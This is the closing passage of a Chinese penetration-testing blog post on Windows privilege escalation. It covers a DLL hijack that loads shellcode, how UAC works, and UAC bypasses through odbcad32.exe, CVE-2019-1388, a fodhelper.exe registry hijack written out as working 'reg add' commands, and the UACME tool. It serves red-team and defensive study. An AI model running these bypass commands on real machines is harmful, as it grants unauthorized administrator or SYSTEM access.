        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701114616.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701114616.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701114616.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701114616.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701114616.png-water_print" /></p>
<p>选择 C++ 语言，搜索 <code>Library</code> ，然后点击 <code>DLL</code>模板：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701114813.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701114813.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701114813.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701114813.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701114813.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701114813.png-water_print" /></p>
<p>项目名称应该匹配我们要劫持的 DLL 名称。将工具生成的代码内容复制到 dllmain.cpp 中：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701115449.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701115449.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701115449.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701115449.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701115449.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701115449.png-water_print" /></p>
<p>当 <code>DLL_PROCESS_ATTACH</code> 时间被触发时，DLL 会创建一个新线程。<code>DoMagic()</code> 函数从 shellcode.bin 读取 payload 到内存中，并执行。</p>
<p>下一步即可编译该 DLL 库文件，选择合适的架构：<code>x64/x86</code>，然后选择 <code>release</code>，build 即可。</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701115906.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701115906.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701115906.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701115906.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701115906.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701115906.png-water_print" /></p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190102110451.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190102110451.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190102110451.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190102110451.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190102110451.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190102110451.png-water_print" /></p>
<h2 id="7-bypass-uac">7 Bypass UAC</h2>
<h3 id="71-原理及概念">7.1 原理及概念</h3>
<blockquote>
<p>User Account Control(UAC)是在 Windows Vista 以后版本中引入的一种安全机制，针对具有有限权限的账户。通过 UAC，应用程序和任务可始终在非管理员帐户的安全上下文中运行，除非管理员特别授予管理员级别的系统访问权限。UAC 可以阻止未经授权的应用程序自动进行安装，并防止无意中更改系统设置。</p>
</blockquote>
<h4 id="711-uac-的实现">7.1.1 UAC 的实现</h4>
<p>ACL（Access Control List）：Windows 中所有资源都有 ACL ，这个列表决定了拥有何种权限的用户/进程能够这个资源。</p>
<p>在开启了 UAC 之后，如果用户是标准用户， Windows 会给用户分配一个标准 <code>Access Token</code>
如果用户以管理员权限登陆，会生成两份访问令牌，一份是完整的管理员访问令牌（Full Access Token），一份是标准用户令牌。一般情况下会以标准用户权限启动 Explorer.exe 进程。如果用户同意，则赋予完整管理员权限访问令牌进行操作。</p>
<h4 id="712-配置-uac-策略">7.1.2 配置 UAC 策略</h4>
<p>Win+R，输入 gpedit.msc，打开组策略，在「计算机配置 – Windows设置 – 安全设置 – 本地策略 – 安全选项」，再在右侧窗口找到「用户帐户控制： 管理员批准模式中管理员的提升权限提示的行为」，如下图：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130094033.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130094033.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130094033.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130094033.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130094033.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130094033.png-water_print" /></p>
<ul>
<li>不提示直接提升：关闭 UAC，需要权限时直接提升权限。</li>
<li>在安全桌面上提示凭据：需要权限时在安全桌面上输入管理员密码提升权限。</li>
<li>在安全桌面上同意提示：需要权限时在安全桌面上选择「允许」提升权限。</li>
<li>提示凭据：需要权限时在普通窗口中输入管理员密码提升权限。</li>
<li>同意提示：需要权限时在普通窗口中选择「允许」提升权限。</li>
<li>非 Windows 二进制文件的同意提示：(默认设置) 当非 Microsoft 应用程序的某个操作需要提升权限时，选择「允许」提升权限。</li>
</ul>
<h4 id="713-提示-uac-的情况">7.1.3 提示 UAC 的情况</h4>
<p>因为普通应用执行权限有限，某些操作必然会要求更高的管理员权限。此时，通常就需要一个权限提升的操作。程序可以向系统请求提权，系统会将此请求通过提一个提示框，请用户确认。</p>
<p>触发 UAC 的行为：</p>
<ul>
<li>配置Windows Update</li>
<li>增加或删除用户账户</li>
<li>改变用户的账户类型</li>
<li>改变 UAC 设置</li>
<li>安装 ActiveX</li>
<li>安装或移除程序</li>
<li>安装设备驱动程序</li>
<li>设置家长控制</li>
<li>将文件移动或复制到 Program Files 或 Windows 目录</li>
<li>查看其他用户文件夹</li>
</ul>
<p>如果当前用户的用户组权限不是管理员，提权操作是要求输入管理员密码的，这点和在 Linux 中的相应操作类似。</p>
<ul>
<li>程序只能在运行前要求提权。如果已经在运行了，那么将失去申请提权的能力</li>
<li>权限提升仅对此次进程有效</li>
</ul>
<p>提升权限的操作大致有两个：</p>
<ul>
<li>自动提权请求</li>
<li>手动提权请求</li>
</ul>
<p>手动提权就是「以管理员身份运行」，自动提权请求就是程序本身就一运行就开始申请权限，如：注册表编辑器</p>
<p>在开发的过程中，程序员若要开发一个程序，可以在编译器配置，写入一个配置文件，用于向系统标识该应用程序是必须要管理员权限运行的。</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130095000.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130095000.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130095000.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130095000.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130095000.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130095000.png-water_print" /></p>
<ul>
<li>aslnvoker 默认权限</li>
<li>highestAvailable 最高权限</li>
<li>requireAdministrator 必须是管理员权限</li>
</ul>
<p>将编译选项调整为 requireAdministrator，当用户运行程序后，将获得管理员权限会话，不需要绕过 UAC 了。</p>
<p>manifest 中其实还有其他属性，如：autoElevate（自动提升）</p>
<h3 id="72-auto-elevate-自动提升权限分析">7.2 auto Elevate 自动提升权限分析</h3>
<p>拥有自动权限提升属性的文件，会在启动时自动提升权限，而这些应用程序往往都具备微软的签名，微软认为它是可信的。故此，在该程序启动时，将会以管理员身份启动，假设通过 DLL 劫持，也能获得管理员权限。</p>
<p>但是：</p>
<ul>
<li>可能分析成本较高</li>
<li>可能需要高权限才能够完成</li>
</ul>
<h4 id="721-寻找-auto-elevate">7.2.1 寻找 auto Elevate</h4>
<p><a href="https://github.com/g3rzi/Manifesto" target="_blank" rel="noopener noreffer">https://github.com/g3rzi/Manifesto</a></p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130095630.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130095630.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130095630.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130095630.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130095630.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130095630.png-water_print" /></p>
<p>如果上述程序存在 DLL 劫持漏洞，那么普通用户就可以用低权限绕过 UAC 确认，以高权限执行任意代码。</p>
<h4 id="722-手动-bypass-uac">7.2.2 手动 bypass UAC</h4>
<p><code>C:\Windows\system32\odbcad32.exe</code> 该程序用于配置 ODBC 数据源，但提供了一个输入点，那就是文件浏览器，通过文件浏览器我们可以打开一个管理员权限的 Powershell。</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130100157.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130100157.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130100157.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130100157.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130100157.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130100157.png-water_print" /></p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130100211.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130100211.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130100211.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130100211.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130100211.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130100211.png-water_print" /></p>
<p>还有一个特别典型的例子就是：<code>CVE-2019-1388</code> 证书提权漏洞。</p>
<p>通过点击「展示证书发行者的详细信息」链接会触发 <code>consent.exe</code> 以 <code>SYSTEM</code> 权限打开浏览器访问此链接，然后此浏览器就会有 <code>SYSTEM</code> 权限。通过保存该浏览页面，会弹出微软的资源管理器，在资源管理器中邮件打开 <code>cmd.exe</code> 程序，就会继承浏览器的 <code>SYSTEM</code> 权限，由此就完成了由普通用户到 <code>NT AUTHORITY\SYSTEM</code> 用户的提权。</p>
<h3 id="73-利用注册表-bypass-uac">7.3 利用注册表 bypass UAC</h3>
<p>一些高权限的程序会调用 <code>HKCR:\</code> 下的键值。</p>
<p>流程：</p>
<ol>
<li>通过修改 <code>HKCU:\</code> 下面的键值同步修改 <code>HKCR:\</code> 下的键值。</li>
<li>把原本的键值改为 <code>cmd.exe</code> 等 shell 程序。</li>
<li>如果高权限的程序在运行过程中调用此处被修改过的键值，就会以高权限启动我们设定的程序。</li>
<li>如此便实现了 Bypass UAC。</li>
</ol>
<p>常见的有：eventvwr.exe、fodhelper.exe，下面以 fodhelper.exe 为例：</p>
<ul>
<li>Path：<code>C:\Windows\system32\fodhelper.exe</code></li>
<li>REG：<code>HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command</code></li>
</ul>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">reg add HKEY_CURRENT_USER<span class="se">\S</span>oftware<span class="se">\C</span>lasses<span class="se">\m</span>s-settings<span class="se">\s</span>hell<span class="se">\o</span>pen<span class="se">\c</span>ommand /d C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\c</span>md.exe /f
</span></span><span class="line"><span class="cl">reg add HKEY_CURRENT_USER<span class="se">\S</span>oftware<span class="se">\C</span>lasses<span class="se">\m</span>s-settings<span class="se">\s</span>hell<span class="se">\o</span>pen<span class="se">\c</span>ommand /v DelegateExecute /t REG_DWORD /d <span class="m">00000000</span> /f
</span></span></code></pre></td></tr></table>
</div>
</div><p>在 msf 中已经集成了相应的利用方式。</p>
<h3 id="74-uacme">7.4 UACME</h3>
<p>工具地址：<a href="https://github.com/hfiref0x/UACME" target="_blank" rel="noopener noreffer">https://github.com/hfiref0x/UACME</a>，内含 60+ 种 BypassUAC 的方法</p>
<p>工具列表如下:</p>
<p>Akagi 是项目的主程序，其中包含了所有的 Methods，绕过 UAC 的主要方法的源码都在 Method 目录下，会以 UAC 绕过方法的发现者的名字来命名源文件。</p>
<p>clone 到本地后，用 VS2019 打开，选择 uacme.vcxproj，以 Release|x64 去 build，然后 <code>ctrl+b</code> build 项目，生成的项目在 source/Akag/output 下</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130110835.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130110835.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130110835.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130110835.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130110835.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130110835.png-water_print" /></p>
<p>使用 <code>vs2019</code> 本地编译后可以使用 <code>akagi32 41</code> 或者 <code>akagi64 41</code> 启动程序，<code>41 </code>这个指的是 <code>README</code> 中描述的方法索引，运行后可以直接得到管理员权限的 <code>cmd</code> 窗口：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130110806.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130110806.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130110806.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130110806.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130110806.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200130110806.png-water_print" /></p>
<h2 id="8-自动化检测">8 自动化检测</h2>
<p>winPEAS</p>
<p>工具地址：<a href="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite" target="_blank" rel="noopener noreffer">https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite</a></p>
<h2 id="9-土豆类提权">9 土豆类提权</h2>
<p>在「potato 家族提权分析」中已有介绍，再次不做赘述。</p>
<h2 id="10-参考">10 参考</h2>
<ul>
<li><a href="http://www.fuzzysecurity.com/tutorials/16.html" target="_blank" rel="noopener noreffer">http://www.fuzzysecurity.com/tutorials/16.html</a></li>
<li><a href="https://www.xazlsec.com/index.php/archives/245/" target="_blank" rel="noopener noreffer">https://www.xazlsec.com/index.php/archives/245/</a></li>
<li><a href="https://at449.com/2020/04/09/2007/" target="_blank" rel="noopener noreffer">https://at449.com/2020/04/09/2007/</a></li>
<li><a href="https://www.xazlsec.com/index.php/archives/1164/" target="_blank" rel="noopener noreffer">https://www.xazlsec.com/index.php/archives/1164/</a></li>
<li><a href="https://mp.weixin.qq.com/s?__biz=MzAwMzYxNzc1OA==&amp;mid=2247486118&amp;idx=1&amp;sn=930334f1ff5c4346f99f3c48e5f0cb70&amp;chksm=9b392c17ac4ea501b2b49bdcaa63f443764fda78fdd062f18a17fa22a1786c8d4a851d533e94&amp;mpshare=1&amp;scene=1&amp;srcid=0127hS1fJmbt9ZCNjTeMKQtu&amp;sharer_sharetime=1611715619297&amp;sharer_shareid=06b3d2342860df5ceb4db092f2e007ae#rd" target="_blank" rel="noopener noreffer">酒仙桥六号部队 - 红队测试之Windows提权小结</a></li>
<li><a href="https://3gstudent.github.io/DLL%e5%8a%ab%e6%8c%81%e6%bc%8f%e6%b4%9e%e8%87%aa%e5%8a%a8%e5%8c%96%e8%af%86%e5%88%ab%e5%b7%a5%e5%85%b7Rattler%e6%b5%8b%e8%af%95/" target="_blank" rel="noopener noreffer">https://3gstudent.github.io/DLL劫持漏洞自动化识别工具Rattler测试/</a></li>
<li><a href="https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/" target="_blank" rel="noopener noreffer">https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/</a></li>
<li><a href="https://payloads.online/archivers/2020-03-02/2" target="_blank" rel="noopener noreffer">https://payloads.online/archivers/2020-03-02/2</a></li>
<li><a href="http://blog.leanote.com/post/snowming/ec21a4823438" target="_blank" rel="noopener noreffer">http://blog.leanote.com/post/snowming/ec21a4823438</a></li>
</ul>
</div><div class="post-footer" id="post-footer">
    <div class="post-info">
        <div class="post-info-line">
            <div class="post-info-mod">
                <span>更新于 2021-01-26</span>
            </div>
            <div class="post-info-license"></div>
        </div>
        <div class="post-info-line">
            <div class="post-info-md"></div>
            <div class="post-info-share">
                <span><a href="javascript:void(0);" title="分享到 微博" data-sharer="weibo" data-url="https://www.geekby.site/2021/01/windows%E6%8F%90%E6%9D%83%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/" data-title="Windows 提权方式总结"><i class="fab fa-weibo fa-fw"></i></a><a href="javascript:void(0);" title="分享到 Evernote" data-sharer="evernote" data-url="https://www.geekby.site/2021/01/windows%E6%8F%90%E6%9D%83%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/" data-title="Windows 提权方式总结"><i class="fab fa-evernote fa-fw"></i></a><a href="javascript:void(0);" title="分享到 Skype" data-sharer="skype" data-url="https://www.geekby.site/2021/01/windows%E6%8F%90%E6%9D%83%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/" data-title="Windows 提权方式总结"><i class="fab fa-skype fa-fw"></i></a></span>
            </div>
        </div>
    </div>

    <div class="post-info-more">
        <section class="post-tags"><i class="fas fa-tags fa-fw"></i>&nbsp;<a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>,&nbsp;<a href="/tags/%E6%8F%90%E6%9D%83/">提权</a></section>
        <section>
            <span><a href="javascript:void(0);" onclick="window.history.back();">返回</a></span>&nbsp;|&nbsp;<span><a href="/">主页</a></span>
        </section>
    </div>

    <div class="post-nav"><a href="/2021/01/%E7%BA%A2%E8%93%9D%E5%AF%B9%E6%8A%97%E4%B8%ADrdp%E5%8D%8F%E8%AE%AE%E7%9A%84%E5%88%A9%E7%94%A8/" class="prev" rel="prev" title="红蓝对抗中 RDP 协议的利用"><i class="fas fa-angle-left fa-fw"></i>红蓝对抗中 RDP 协议的利用</a>
            <a href="/2021/01/cve-2021-3156%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" class="next" rel="next" title="CVE-2021-3156 sudo 提权漏洞复现">CVE-2021-3156 sudo 提权漏洞复现<i class="fas fa-angle-right fa-fw"></i></a></div>
</div>
</article></div>
            </main><footer class="footer">
        <div class="footer-container"><div class="footer-line"><i class="far fa-copyright fa-fw"></i><span itemprop="copyrightYear">2019 - 2022</span><span class="author" itemprop="copyrightHolder">&nbsp;<a href="/" target="_blank">Geekby</a></span>&nbsp;|&nbsp;<span class="license"><a rel="license external nofollow noopener noreffer" href="https://creativecommons.org/licenses/by-nc/4.0/" target="_blank">CC BY-NC 4.0</a></span></div>
        </div>
    </footer></div>

        <div id="fixed-buttons"><a href="#" id="back-to-top" class="fixed-button" title="回到顶部">
                <i class="fas fa-arrow-up fa-fw"></i>
            </a><a href="#" id="view-comments" class="fixed-button" title="查看评论">
                <i class="fas fa-comment fa-fw"></i>
            </a>
        </div><link rel="stylesheet" href="/lib/lightgallery/lightgallery.min.css"><script type="text/javascript" src="/lib/smooth-scroll/smooth-scroll.min.js"></script><script type="text/javascript" src="/lib/autocomplete/autocomplete.min.js"></script><script type="text/javascript" src="/lib/algoliasearch/algoliasearch-lite.umd.min.js"></script><script type="text/javascript" src="/lib/lazysizes/lazysizes.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lightgallery.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lg-thumbnail.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lg-zoom.min.js"></script><script type="text/javascript" src="/lib/clipboard/clipboard.min.js"></script><script type="text/javascript" src="/lib/sharer/sharer.min.js"></script><script type="text/javascript">window.config={"code":{"copyTitle":"复制到剪贴板","maxShownLines":100},"comment":{},"lightGallery":{"actualSize":false,"exThumbImage":"data-thumbnail","hideBarsDelay":2000,"selector":".lightgallery","speed":400,"thumbContHeight":80,"thumbWidth":80,"thumbnail":true},"search":{"algoliaAppID":"C19A58DMI2","algoliaIndex":"blog","algoliaSearchKey":"a7203b4397475a3fcf49cea4495e0987","highlightTag":"em","maxResultLength":10,"noResultsFound":"没有找到结果","snippetLength":50,"type":"algolia"}};</script><script type="text/javascript" src="/js/theme.min.js"></script></body>
</html>
